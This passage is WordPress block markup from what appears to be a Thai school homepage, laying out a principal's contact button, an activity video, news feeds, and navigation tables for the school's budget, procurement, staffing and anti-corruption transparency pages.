ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/headline {\"uniqueId\":\"0ec6139a\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-0ec6139a gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 